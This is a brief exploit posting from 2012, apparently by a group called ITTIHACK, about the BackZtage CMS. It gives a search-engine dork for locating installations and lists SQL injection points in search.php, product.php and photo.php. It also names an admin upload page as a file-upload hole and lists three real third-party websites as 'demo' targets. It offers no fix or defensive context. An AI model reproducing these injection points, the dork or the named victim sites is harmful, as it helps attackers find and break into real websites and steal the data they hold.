BackZtage CMS ( SQLi/ File Upload ) Vulnerabilities Software : BackZtage Date : 2/9/2012 Vendor : http://www.backztagemedia.com Software : http://www.backztagemedia.com/services.php Dork : "Powered by BackZtage" Author : ITTIHACK Home : http://ittihack.com SQL Injection: Exploit : http://target//search.php?id=[SQLi] http://target//product.php?id=[SQLi] http://target//photo.php?id=[SQLi] File Upload: Exploit : http://target/admin/uploadlogin.php Demo Sites: http://www.dpproductions.sg/photo.php?id=3 http://www.ajmason.com/project-gallery.php?id=25 http://backztage.com.hk/subcategory.php?cid=93 May allah have mercy on the martyrs of Syria